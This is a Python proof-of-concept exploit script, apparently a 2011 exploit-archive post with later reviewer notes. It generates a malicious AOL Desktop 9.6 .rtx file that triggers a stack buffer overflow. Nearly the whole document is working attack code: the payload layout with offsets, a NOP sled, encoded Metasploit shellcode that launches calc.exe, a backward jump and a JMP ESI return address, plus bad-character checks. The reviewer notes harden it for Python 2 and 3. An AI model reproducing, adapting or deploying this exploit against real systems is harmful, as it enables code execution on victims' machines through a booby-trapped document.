AOL Desktop 9.6 Buffer Overflow
Posted on 04 February 2011
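#!/usr/bin/python
"""AOL Desktop 9.6 buffer overflow - proof-of-concept .rtx generator.

Vulnerable app : AOL Desktop 9.6
Author         : sickness
Download       : http://daol.aol.com/software/aoldesktop96/
Tested         : Windows XP Professional SP3 (EN) latest updates
Date           : 02/02/2011

The script writes ``exploit.rtx``, an AOL rich-text document whose ``HREF``
attribute value is 6000 bytes long.  Layout of that overflow region
(offsets relative to the start of the payload, end exclusive):

    0    .. 4968   NOP sled (EIP_OFFSET - SHELLCODE_ROOM)
    4968 .. 4984   16 NOPs: landing zone for the backward jump
    4984 .. 5208   encoded shellcode (windows/exec CMD=calc.exe, 224 bytes)
    5208 .. 5368   NOP padding up to the return-address area
    5368 .. 5373   jmp -400 (E9 70 FE FF FF); 5373 - 400 = 4973, inside the landing NOPs
    5373 .. 5384   11 NOPs
    5384 .. 5388   0x20C5CFC0, "universal JMP ESI" from aolusershell.dll (per the author)
    5388 .. 6000   NOP filler

Notes from the original author:
  * If the exploit doesn't work, kill every AOL process (CTRL+ALT+DELETE,
    end all AOL processes) and try again.
  * You might need to change the offset (EIP_OFFSET) for other builds.
  * A shellcode larger than the 400-byte window needs a larger negative jump.
  * Watch out for other bad chars.  Currently known:
    0x00 0x0a 0x0d 0x20 0x31 0x90 0x3e
  * The JMP ESI was located with pvefindaddr:
    http://redmine.corelan.be:8800/projects/pvefindaddr

Reviewer notes:
  * The document is built from ``bytes`` and written in binary mode so the
    output is byte-exact under Python 2 and 3.  The original opened the file
    in text mode; on Windows that rewrites the 0x0a bytes of the trailer as
    0x0d 0x0a, and under Python 3 it would UTF-8-encode every byte >= 0x80
    of the shellcode, shifting the whole layout.
  * The encoded shellcode is checked against BAD_CHARS before assembly, and
    the build refuses a shellcode that does not fit the 400-byte window
    (the original silently truncated the padding to an empty string).
  * The JMP ESI address 0x20C5CFC0 itself contains 0x20, which is on the
    author's bad-character list.  The author reports the exploit working;
    if a rebuilt file fails, confirm under a debugger that all four address
    bytes reach the stack intact.
  * This is a weaponised client-side PoC: the generated .rtx runs calc.exe
    when opened by a vulnerable AOL Desktop.  Use only in an isolated lab.
"""

# Bytes that must not appear in the shellcode (passed to msfencode -b).
BAD_CHARS = b'\x00\x0a\x0d\x20\x31\x90\x3e'

# First header: the document up to the start of the overlong HREF value.
hd1 = (b'<HTML><FONT  SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" '
       b'FACE="Arial" LANG="0"><A HREF="http://')

# Second header: closes the HREF value and the document.  Contains 0x0d 0x0a
# on purpose; it sits outside the overflow region.
hd2 = b'">test</A><U><BR>\r\n</U></FONT></HTML>\r\n'

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x20\x31\x90\x3e' -t c
SHELLCODE = (
    b"\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    b"\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22"
    b"\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03"
    b"\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16"
    b"\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed"
    b"\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72"
    b"\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16"
    b"\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e"
    b"\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b"
    b"\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66"
    b"\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05"
    b"\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1"
    b"\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02"
    b"\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d"
    b"\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a"
)

NOP = b'\x90'
EIP_OFFSET = 5368        # bytes of payload until the saved return address is overwritten
SHELLCODE_ROOM = 400     # bytes below EIP_OFFSET reachable by JMP_BACK (sled + shellcode)
LANDING_NOPS = 16        # NOPs at the top of that window that JMP_BACK lands in
GAP_NOPS = 11            # NOPs between JMP_BACK and the JMP ESI address
TOTAL_LEN = 6000         # total length of the HREF value
# jmp rel32 -400: executed at EIP_OFFSET, so its target is EIP_OFFSET + 5 - 400.
# The displacement is fixed; change it together with SHELLCODE_ROOM.
JMP_BACK = b'\xe9\x70\xfe\xff\xff'
# 0x20C5CFC0 little-endian; the author's "universal JMP ESI" in aolusershell.dll.
# NOTE(review): the 0x20 byte is on BAD_CHARS - see module docstring.
JMP_ESI = b'\xC0\xCF\xC5\x20'


def check_bad_chars(data, bad_chars=BAD_CHARS):
    """Return the sorted list of byte values from *bad_chars* found in *data*.

    Works on ``bytes``/``str`` under Python 2 and on ``bytes`` under Python 3
    by going through ``bytearray`` (iteration yields ints in both).
    """
    forbidden = set(bytearray(bad_chars))
    return sorted(set(bytearray(data)) & forbidden)


def build_payload(shellcode=SHELLCODE, eip_offset=EIP_OFFSET, total_len=TOTAL_LEN):
    """Assemble the 6000-byte HREF value (the overflow region) as bytes.

    shellcode  -- encoded shellcode to place in the 400-byte window below
                  *eip_offset*; must avoid BAD_CHARS.
    eip_offset -- number of payload bytes before the return address area.
    total_len  -- final length; the tail is NOP-filled.

    Raises ValueError if the shellcode contains a bad char, does not fit the
    window, or the offsets do not leave room for the layout.
    """
    found = check_bad_chars(shellcode)
    if found:
        raise ValueError('shellcode contains bad chars: %s'
                         % ' '.join('\\x%02x' % b for b in found))
    room = SHELLCODE_ROOM - LANDING_NOPS
    if len(shellcode) > room:
        raise ValueError('shellcode is %d bytes, max %d without enlarging the negative jump'
                         % (len(shellcode), room))
    if eip_offset < SHELLCODE_ROOM:
        raise ValueError('eip_offset %d is smaller than the %d-byte shellcode window'
                         % (eip_offset, SHELLCODE_ROOM))

    payload = NOP * (eip_offset - SHELLCODE_ROOM)   # sled up to the window
    payload += NOP * LANDING_NOPS                   # where JMP_BACK lands
    payload += shellcode
    payload += NOP * (eip_offset - len(payload))    # pad up to EIP_OFFSET
    payload += JMP_BACK
    payload += NOP * GAP_NOPS
    payload += JMP_ESI
    if len(payload) > total_len:
        raise ValueError('layout needs %d bytes but total_len is %d'
                         % (len(payload), total_len))
    payload += NOP * (total_len - len(payload))
    return payload


def build_exploit(shellcode=SHELLCODE):
    """Return the complete .rtx document: hd1 + payload + hd2, as bytes."""
    return hd1 + build_payload(shellcode) + hd2


# Kept at module level for parity with the original script's `exploit` name.
exploit = build_exploit()


def main(path='exploit.rtx'):
    """Write the generated document to *path* in binary mode and report."""
    try:
        with open(path, 'wb') as fh:
            fh.write(exploit)
        print('File created, time to PEW PEW! ')
    except (IOError, OSError) as exc:
        # Only the write can fail here; the document itself is already built.
        print('Something went wrong! ')
        print('Check if you have permisions to write in that folder, of if the folder exists!')
        print('Error: %s' % exc)


if __name__ == '__main__':
    main()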